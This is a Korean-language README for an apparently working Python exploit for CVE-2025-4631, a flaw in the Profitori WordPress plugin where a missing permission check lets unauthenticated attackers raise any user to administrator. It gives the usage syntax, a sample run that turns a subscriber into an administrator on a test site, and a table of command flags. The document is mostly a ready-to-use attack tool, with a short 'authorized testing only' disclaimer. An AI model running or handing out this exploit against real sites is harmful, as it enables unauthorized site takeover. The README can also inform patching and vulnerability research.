
Profitori 2.0.6.0 - 2.1.1.3 - 인증 누락에서 비인증 권한 상승까지
**Profitori 플러그인 (버전 2.0.6.0 ~ 2.1.1.3)**은 /wp-json/stocktend/v1/stocktend_object 엔드포인트에서 누락된 권한 확인으로 인해 인증되지 않은 권한 상승에 취약합니다. 이를 통해 원격 공격자는 wp_capabilities 메타 필드를 직접 조작하여 기존 사용자의 권한을 상승시키거나 (또는 새 사용자를 생성할 수 있습니다).
이 Python 익스플로잇은 다음을 통해 권한 상승 과정을 자동화합니다:
readme.txt 파일을 통해 플러그인 버전 확인.버전 확인이 실패하면 경고와 함께 조심스럽게 익스플로잇을 진행합니다.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requests 라이브러리설치 방법:
pip install requests
이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가가 없는 시스템에 대해 이 익스플로잇을 오용하는 것은 엄격히 금지됩니다. 제작자는 부적절한 사용으로 인한 손해나 법적 책임을 지지 않습니다.
BY: Nxploited ( Khaled_Alenazi )
| 플래그 | 설명 | 필수 여부 |
|---|
-u, --url | 🌐 WordPress 사이트의 기본 URL | ✅ 예 |
-id | 🆔 권한을 상승시킬 사용자의 ID | ✅ 예 |
--email | 📧 표시할 가짜 이메일 | ❌ 아니오 |
--name | 👤 표시 이름 | ❌ 아니오 |
--url_field | 🔗 사용자 URL 필드 | ❌ 아니오 |
--verbose | 🔍 전체 JSON 응답 출력 | ❌ 아니오 |